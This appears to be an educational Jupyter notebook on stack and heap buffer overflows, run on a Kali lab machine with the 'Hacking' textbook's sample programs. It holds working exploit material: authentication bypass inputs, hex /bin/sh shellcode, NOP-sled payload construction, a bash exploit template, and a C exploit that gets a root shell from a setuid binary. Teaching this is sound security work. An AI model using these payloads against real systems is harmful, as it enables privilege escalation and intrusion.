## Stack Overflow
- overrun in stack segment
- let's use some demoprograms to demonstrate various consequences of stackoverflow

## Stack overflow exploitations

1. overwrite variable(s) with the data of your choice (Integrity)
- change the flow of the program (Integrity)
- remote code execution (Integrity, Confidentiality, Availability)

### 1. Overwrite data in memory
- voilates data integrity
- overwrite variables with the data of your choice on the stack
- let's use demo program: booksrc/overflow_example.cpp

In [14]:
# let's copy overflow_example.cpp to the current folder
! cp booksrc/overflow_example.cpp .

In [15]:
# let's looks at the content of overlfow_example.cpp
! cat overflow_example.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

int main(int argc, char *argv[]) {
	int num = 5;
	char buffer_one[8], buffer_two[8];

	strcpy(buffer_one, "one"); /* copy "one" into buffer_one */
	strcpy(buffer_two, "two"); /* copy "two" into buffer_two */
	
	printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[BEFORE] num is at %p and is %d (0x%08x)\n", &num, num, num);

	printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
	strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

	printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[AFTER] num is at %p and is %d (0x%08x)\n", &num, num, num);
    return 0;
}


### draw stack of main( ) and answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- compile and run the program with some arguments

In [16]:
! ./compile.sh booksrc/overflow_example.cpp overflow_example.exe

In [17]:
! ./overflow_example.exe
# segfault is bad!! provide some argument

[BEFORE] buffer_two is at 0xffffc33c and contains 'two'
[BEFORE] buffer_one is at 0xffffc344 and contains 'one'
[BEFORE] num is at 0xffffc34c and is 5 (0x00000005)


In [19]:
# run the program providing some argument
! ./overflow_example.exe hello
# notice the addresses of variables are shifted

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 5 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'hello'
[AFTER] buffer_one is at 0xffffc334 and contains 'one'
[AFTER] num is at 0xffffc33c and is 5 (0x00000005)


In [20]:
# try a few some other values like 15 As
! ./overflow_example.exe $(python3 -c 'print("A"*15, end="")')
# observe the values of buffer_two and buffer_one, and num

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 15 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAA'
[AFTER] num is at 0xffffc33c and is 5 (0x00000005)


In [21]:
# try 16 As
! ./overflow_example.exe $(python3 -c 'print("A"*16, end="")')
# observe the values of buffer_two and buffer_one, and num
# num is 0 which is ascii value of NULL

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 16 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAA'
[AFTER] num is at 0xffffc33c and is 0 (0x00000000)


- try to overwrite int value variable with "BCDE"
- how may bytes is value away from buffer_two?
- find the difference between the address of value and buffer_two

In [22]:
# try 16As and notice the int value variable
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')
# notice the value of num in hex printed 'EDCB', why?

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAABCDE'
[AFTER] num is at 0xffffc33c and is 1162101570 (0x45444342)


In [23]:
# subtract the address of buffer_two from the address of value
# which variable is at higher location?
! echo $((0xffffc32c - 0xffffc334))

-8


In [24]:
# now try overwriting value with BCDE; in the right order
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., smaller byte is stored first

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAABCDE'
[AFTER] num is at 0xffffc33c and is 1162101570 (0x45444342)


In [25]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

'B'

In [27]:
# or find the hex representation of ASCII of B
hex(ord('B'))

'0x42'

In [28]:
# try one more time; using hex values of EDCB
! ./overflow_example.exe $(python3 -c 'print("A"*16 + "\x45\x44\x43\x42", end="")')

[BEFORE] buffer_two is at 0xffffc32c and contains 'two'
[BEFORE] buffer_one is at 0xffffc334 and contains 'one'
[BEFORE] num is at 0xffffc33c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffc32c and contains 'AAAAAAAAAAAAAAAAEDCB'
[AFTER] buffer_one is at 0xffffc334 and contains 'AAAAAAAAEDCB'
[AFTER] num is at 0xffffc33c and is 1111704645 (0x42434445)


### 2. Change the flow of the program execution
- violates the integriy of the program itself
- use ./booksrc/auth_overflow.cpp program as demo
- authenticate without using actual password
- let's copy and see the contents of auth_overflow.cpp

In [175]:
! cp ./booksrc/auth_overflow.cpp .

In [176]:
! cat ./booksrc/auth_overflow.cpp

#include <cstring>
#include <iostream>

using namespace std;

int check_authentication(char *password) {
	int auth_flag = 0;
	char password_buffer[16];

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		cout << "Usage: " << argv[0] << " password\n";
		exit(0);
	}
	if(check_authentication(argv[1])) {
		cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
		cout << "      Access Granted.\n";
		cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
	} else {
		cout << "\nAccess Denied.\n";
   }
   return 0;
}
	


In [177]:
# let's compile auth_overflow.cpp
! echo kali | sudo -S ./compile.sh auth_overflow.cpp auth_overflow.exe

[sudo] password for kali: 

In [178]:
# run the program; gives help on how to run it properly
! ./auth_overflow.exe

Usage: ./auth_overflow.exe password


In [179]:
# authenticate with password, outgrabe
! ./auth_overflow.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [180]:
# authenticate with password, brillig
! ./auth_overflow.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [181]:
# anyother password shouldn't work!
! ./auth_overflow.exe letmein


Access Denied.


### let's authenticate without real password

In [1]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./auth_overflow.exe $(python -c 'print("A"*16)')


Access Denied.


In [2]:
# how about 17 As?
! ./auth_overflow.exe $(python -c 'print("A"*17)')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### draw stack of check_authentication( ) to explain why 17As let's you in!

### examine stack using gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context
- observe the value of auth_flag; any int value otherthan 0 is treated as true!

```bash
$ gdb -q auth_overflow.exe
$ break check_authentication
$ run $(python3 -c 'print("A"*17)')
$ next i
$ x/s password_buffer
$ x/x &auth_flag
$ p/a &password_buffer
$ p/d auth_flag
```

### variables declaration order changed
- can you overflow if the variable declaration orders are switched?
- normally, variables are pushed on the stack as they're loaded from top to bottom
    - the last variable decalred will be pushed last on the top of the stack
- compile and examine booksrc/auth_overflow2.cpp
- draw stack
- verify it using GDB

In [184]:
# copy booksrc/auth_overflow2.cpp
! cp ./booksrc/auth_overflow2.cpp .

In [185]:
# let's see the source code of booksrc/auth_overflow2.c
! cat auth_overflow2.cpp

#include <cstring>
#include <iostream>

using namespace std;

int check_authentication(char *password) {
    char password_buffer[16];
    int auth_flag = 0;

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		cout << "Usage: " << argv[0] << " password\n";
		exit(0);
	}
	if(check_authentication(argv[1])) {
		cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
		cout << "      Access Granted.\n";
		cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
	} else {
		cout << "\nAccess Denied.\n";
   }
   return 0;
}
	


In [186]:
# let's compile the program
! ./compile.sh booksrc/auth_overflow2.cpp auth_overflow2.exe

In [187]:
# run the program with 17As
! ./auth_overflow2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### well, how is it possible?
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- compiler optimization? (I don't have clear answer to why!)
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
    - see Hacking textbook explanation

### control return to the right block to authenticate?
- overflow the return address to bypass check_authentication() condition in main and directly execute the true block
- possible in older gcc/assembly version (Hacking LiveCD)
- couldn't get it to work on newer system (tested on Kali!
- let's assemble and look at the return instruction...
- repeated instructions: add esp, 0x10 and sub esp, 0xc etc. makes it hard to jump into the right instruction

### could return to "    access granted     " line!
- find the address add esp, 0x10 before the addres to "access granted"
- overflow the buffer and and overwrite the return address with the address that prints "access granted"


### Payload
- create a payload that contains code to exploit the vulnerability
- payload typically has the following structure:

```bash
| repeated nop sled | shellcode | repeated return address |
```

### nop sled
- \x90 - no operation instruction in assembly
- if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
- as the stack may shift a bit, it's harder to land exactly where the shellcode is
- NOP let's you slide right to your shellcode that spawns a shell/terminal
- you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
    
### shellcode
- shellcode is attacker's code that can do anything 
    - such as creating/deleting a log file, adding a new user, change filewall rule, etc.
- binary code that actually exploits the vulnerability
- most common shellcode typically spawns, local or remote, tcp connect, reverse connect shell/terminal
- let's you own the system by giving you access to the terminal
- Shellcodes database - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
  
### repeated return address
- address pointing to some address of repeated nop sled  where it is stored in buffer variable
- this controlled return address should overwrite the caller's return address on stack

### exploit code
- code/program that delivers payload is called exploit code
- helps delivers the shellcode code directly to the vulnerable program
    - over network, stdio, program argument, etc.
- you can create a exploitcode in Bash, Python, C/C++ to send the payload to the vulnerable program

### example exploit programs written in Bash, C++ and Python
- Bash exploit code is in booksrc/exploit_stackoverflow.sh
- C++ exploit code is in booksrc/exploit_stackoverflow.cpp
- Python pwntools generated exploitcode

## 3. Remote code execution
- inject and execute shellcode
- shellcode is a program that gives you shell/terminal on the system
- we'll use a vulnerable program booksrc/stack_overflow_demo.cpp
- let's look at an example program that spawns shell/terminal on the system by calling system call
    - copy, compile and run booksrc/system_shell.cpp program with /bin/sh argument

### Example program that spawns shell/terminal
- high-level code example, using system API

In [38]:
! cp ./booksrc/system_shell.cpp .

In [39]:
! cat system_shell.cpp

#include <cstdlib>

using namespace std;

int main(int argc, char* argv[]) {
    // simply call the system command
    system("/bin/sh");
    return 0;
}

In [40]:
! echo kali | sudo -S ./compile.sh system_shell.cpp system_shell.exe

[sudo] password for kali: 

- run system_shell.exe from terminal
    - Jupyter notebook doesn't give shell/terminal
    
- shellcode:
    - typically is not bash command string byitself - /bin/sh
    - is executable binary when executed gives shell/terminal
    - typically written in assembly and assembled as a binary
    - if stored in stack as a part of buffer, stack must be Executable!
        - so the buffer can be treated as executable code
        
## Code execution demos
- use stack variable to store the remote shellcode
- find the location of the shellcode and execute it

### Use program argument to transmit shellcode
- if the vulnerable program uses argument to get the data, provide shellcode instead of data!
- use the provided stack_overflow_arg.cpp program for demo

In [45]:
! cp booksrc/stack_overflow_arg.cpp .

In [46]:
# let's look at the source
# program simply copies and prints the user provided argument
! cat stack_overflow_arg.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

#define BUFSIZE 128

void copydata(char *dst_buf, char *src_buf) {
    // similar to strcpy in cstdio
    size_t i = 0;
    // copy each character from src_buf to des_buffer
    // stop when NUL character is encountered
    while (*(src_buf+i) != 0) {
        *(dst_buf+i) = *(src_buf+i);
        i++;
    }
    *(dst_buf+i) = 0; // end with NUL character
}

void bad(char *data) {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    //strcpy(buffer, data);
    copydata(buffer, data);
    cout << "buffer contains: \n" << buffer << endl;
}

int main(int argc, char *argv[]) {
    bad(argv[1]);
    cout << "Good bye!" << endl;
    return 0;
}

In [47]:
# let's compile and execute the program
! ./compile.sh stack_overflow_arg.cpp stack_overflow_arg.exe

### crash the program...
- provide a large string and see how the program behaves
- if the program crashes, availability of the program is violated

In [48]:
! ./stack_overflow_arg.exe $(python3 -c 'print("A"*100)')
# note the buffer address!
# How do you know the program has crashed? 
# On terminal you'll see segfault!
# On Jupyter notebook it's not obvious...

buffer is at 0xffffc250
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [51]:
# provide a longer argument and see if the program segfaults
! ./stack_overflow_arg.exe $(python3 -c 'print("A"*128)')
# also note the buffer address

buffer is at 0xffffc230
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [53]:
# provide a longer argument and see if the program segfaults
! ./stack_overflow_arg.exe $(python3 -c 'print("A"*140)')
# buffer size is 128; 124 As crashes the program; notice no Good bye! printed
# also note the buffer address

buffer is at 0xffffc230
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


In [55]:
%%bash
# let's look at the bash exploit code
# note, certain values such as return address will be different in different system
# return must be updated if necessary!
cp booksrc/stack_overflow_env_exploit.sh .
cat stack_overflow_env_exploit.sh

#!/bin/bash
#
# Template for local interactive exploit code using bash script
#

# Generate payload in the format: | NOP sled | shellcode | repeated return address |
# write each line of shellcode generated by PEDA to a file

# write shellcode to a file
shellcode_file_name="shellcode.bin"
echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" > $shellcode_file_name
echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> $shellcode_file_name

# bulnerable program to exploit
target_program="stack_overflow_env.exe"
offset=116 # FIXME Offset: EIP+0+4 or look for [ESP] --> offset ... in PEDA pattern search
#python3 -c 'print("A"*112, end="")' | ./$target_program

# feed buffer variable's address in Little Endian; reverse of what you see on screen
# add a few bytes so it's in the middle
# printf "%x" $((0xffffc36c + half of NOP Size))
#printf "buffer_address: %x\n" $((0xffffc2cc + 34))
buffer_address="\x3c\xc1\xff\xff"

wc -c shellcode.bin
shellcode_size=24 # find and update the 

## update the exploit code if necessary
- find and update the offset using gdb-peda
- find and update the address of the buffer
- from terminal run the exploit code
```bash
bash stack_overflow_exploit_env.sh
```

## exploit setuid program
- if setuid program has stackoverflow vulnerability, exploiting it with the right shellcode will give root shell!
- let's set euid of the **stack_overflow_demo.exe** program
- exploit it with the **stack_overflow_exploit_setuid.sh**
- exploit code is very similar to **stack_overflow_exploit.sh**
    - only the shellcode and its size is different

In [13]:
%%bash
echo kali | sudo -S chown root:root stack_overflow_demo.exe
echo kali | sudo -S chmod +s stack_overflow_demo.exe

[sudo] password for kali: 

In [14]:
! ls -al stack_overflow_demo.exe

-rwsr-sr-x 1 root root 33132 Dec  9 00:38 stack_overflow_demo.exe


In [16]:
! cp ./booksrc/stack_overflow_exploit_setuid.sh .

### run the exploit code

```bash
./bash stack_overflow_exploit_setuid.sh
```

### Exploit ROP - Return-oriented progaramming

Modify caller's return address
1. find where the caller's return address is stored on stack
2. find the address of the exploit code that'll be loaded on the stack/buffer
3. modify the return address with the address of the exploit code
4. find the offset that will overwrite the value of the caller's return address
- two ways to find the offset:
    1. use gdb
    ```bash
    gdb -q stack_overflow_demo.exe
    break bad
    run AAAA
    print $ebp+8
    print &buffer
    print [address of $ebp+8 - &buffer] # note must use hex addresses
    # gives you the offset required to overwrite the caller's return address
    ```
   
    2. use peda pattern search technique as described below
        - easier; no math required and stepping through the code

### using GDB-PEDA
- create pattern and use as an agrument to the program
- crash the vulnerable program and run pattern search or patts to find offset of return address
    - gdb -q ./stack_overflow_demo.exe
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP+0 or EBP+0 offset + 4
        - `EIP+0 found at offset: 76` 
        - that's the total offset required to overwrite the caller's return address 
        
#### generate skeleton exploit code using GDB-PEDA
- generates python2 code

```bash
    skeleton argv exploit_stackoverflow.py
```
    
#### create local linux shellcode 

```bash
    shellcode generate x86/linux exec
```
- can write the generated shellcode to a file for easy access
- copy line by line hex values between " " and append it to a binary file
- you can bash echo, perl, python3

In [4]:
# -n : do not print the trailing newline
# -e : enable intrepretation of blackslash
! echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31" > shellcode_bash.bin
! echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode_bash.bin

In [5]:
! wc -c shellcode_bash.bin

24 shellcode_bash.bin


In [15]:
! hexdump -C shellcode_bash.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


In [13]:
# Python3 script
with open('shellcode_py3.bin', 'wb') as fout:
    fout.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31")
    fout.write(b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")

In [14]:
! wc -c shellcode_py3.bin

24 shellcode_py3.bin


In [16]:
! hexdump -C shellcode_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


In [21]:
# Python3 from terminal
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' > shellcode1_py3.bin

In [23]:
! wc -c shellcode1_py3.bin

24 shellcode1_py3.bin


In [25]:
! hexdump -C shellcode1_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


## Using bash to exploit stack_overflow_demo.exe
1. create the payload
2. send payload to the vulnerabale program using exploitcode

#### create payload
- find offset using technique stated above
    - using gdb or peda
- let's say **76** is the total offset
- now, let's create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)

In [81]:
# how did we find the size of the nop sled?
print(76-(24+4))

48


In [105]:
# let's create the payload of 76 bytes long, e.g.
! perl -e 'print "\x90"x48' > payload.bin

In [106]:
! cat shellcode.bin >> payload.bin

In [107]:
! ./stack_overflow_demo.exe $(python3 -c 'print("A"*76, end="")')

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is at 0xffffc2a0


In [108]:
# find 20 bytes away from the base address of the buffer
! printf "%x" $((0xffffc2a0+20))

ffffc2b4

In [109]:
! perl -e 'print "\xb4\xc2\xff\xff"' >> payload.bin

In [110]:
! wc -c payload.bin

76 payload.bin


In [111]:
! hexdump -C payload.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000030  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000040  c9 89 ca 6a 0b 58 cd 80  b4 c2 ff ff              |...j.X......|
0000004c


### from terminal send the payload
```bash
./stack_overflow_demo.exe $(cat payload.bin)
```
- now the buffer is at different address

In [112]:
! printf "%x" $((0xffffc320+20))

ffffc334

In [113]:
# let's create the payload of 76 bytes long, e.g.
! ./stack_overflow_demo.exe $(perl -e 'print "\x90"x48'; cat 

### booksrc/notesearch.c has stackoverflow vulnerability
- let's look at the source of booksrc/notesearch.c

In [73]:
! cat booksrc/notesearch.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // note printing function
int find_user_note(int, int);        // seek in file for a note for user
int search_note(char *, char *);     // search for keyword function
void fatal(char *);                  // fatal error handler

int main(int argc, char *argv[]) {
	int userid, printing=1, fd; // file descriptor
	char searchstring[100];

	if(argc > 1)                        // If there is an arg
		strcpy(searchstring, argv[1]);   //   that is the search string
	else                                // otherwise
		searchstring[0] = 0;             //   search string is empty

	userid = getuid();
	fd = open(FILENAME, O_RDONLY);   // open the file for read-only access
	if(fd == -1)
		fatal("in main() while opening file for reading");

	while(printing)
		printing = print_notes(fd, userid, searchstring);
	printf("-------[ end of 

In [74]:
# lets compile notesearch.c to a binary
! ./compile.sh booksrc/notesearch.c notesearch.exe

booksrc/notesearch.c: In function ‘main’:
booksrc/notesearch.c:23:11: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   23 |  userid = getuid();
      |           ^~~~~~
booksrc/notesearch.c:31:2: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
   31 |  close(fd);
      |  ^~~~~
      |  pclose
booksrc/notesearch.c: In function ‘print_notes’:
booksrc/notesearch.c:45:2: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
   45 |  read(fd, note_buffer, note_length); // read note data
      |  ^~~~
      |  fread
booksrc/notesearch.c: In function ‘find_user_note’:
booksrc/notesearch.c:74:2: warning: implicit declaration of function ‘lseek’; did you mean ‘fseek’? [-Wimplicit-function-declaration]
   74 |  lseek(fd, length * -1, SEEK_CUR); // rewind file reading by length bytes
      |  ^~~~~
      |  fseek


#### notesearch program finds note from /var/notes priviledged folder
- change ownership to root and setuid

```bash
$ sudo chown root:root notesearch.exe
$ sudo chmod +s notesearch.exe
```

In [75]:
# let's see the detail of notesearch.exe
! ls -al notesearch.exe

-rwsr-sr-x 1 root root 19928 Apr 27 13:42 notesearch.exe


In [ ]:
! ./notesearch.exe $(perl -e 'print "A"x60')

### notesearch exploit
- booksrc has provide exploit code written in C
- shellcode is modified to work on modern x86 kernel
- let's compile and run the exploit code in terminal

In [77]:
# let's look at the exploit code
! cat booksrc/exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=224;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch.exe \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}



In [76]:
# let's compile the exploit code
# if you know the exact offset; modify the value of offset and compile
# if not don't worry about it, you can try and guess!
! ./compile.sh booksrc/exploit_notesearch.c exploit_notesearch.exe

#### run the exploit
- run the exploit_notesearch.exe from the terminal
- use wrapper bash script booksrc/exploit_notesearch.sh to try different offset

```bash
$ ./exploit_notesearch.exe
$ bash exploit_notesearch.sh
```
- change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### booksrc/notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [78]:
! cat booksrc/notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);


In [79]:
# let's compile notetaker.c
! ./compile.sh ./booksrc/notetaker.c notetaker.exe

./booksrc/notetaker.c: In function ‘main’:
./booksrc/notetaker.c:38:13: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   38 |    userid = getuid(); // get the real user ID
      |             ^~~~~~
./booksrc/notetaker.c:41:7: warning: implicit declaration of function ‘write’; did you mean ‘fwrite’? [-Wimplicit-function-declaration]
   41 |    if(write(fd, &userid, 4) == -1) // write user ID before note data
      |       ^~~~~
      |       fwrite
./booksrc/notetaker.c:50:7: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
   50 |    if(close(fd) == -1)
      |       ^~~~~
      |       pclose


### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```bash
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [80]:
%%bash
ls -al ./notetaker.exe

-rwsr-sr-x 1 root root 19248 Apr 29 13:14 ./notetaker.exe


In [81]:
%%bash
./notetaker.exe "new note for user"

[DEBUG] buffer   @ 0x804d1a0: 'new note for user'
[DEBUG] datafile @ 0x804d210: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.


## overflowing buffer by corrupting datafile
- how far down is datafile from buffer (the offset)
- see source code and try to guess
- use gdb; subtract the address of buffer from the address of datafile

In [84]:
%%bash
./notetaker.exe $(perl -e 'print "A"x112')
# make datafile empty!

[DEBUG] buffer   @ 0x804d1a0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804d210: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "A"x112\')\n# make datafile empty!\n'' returned non-zero exit status 255.

In [88]:
# let's make sure testfile doesn't exist in the current director
! ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [85]:
%%bash
# let's create testfile and write the data sent as an argument
./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 2:  4315 Aborted                 ./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'# let\'s create testfile and write the data sent as an argument\n./notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [86]:
%%bash
ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [87]:
%%bash
cat testfile

cat: testfile: Permission denied


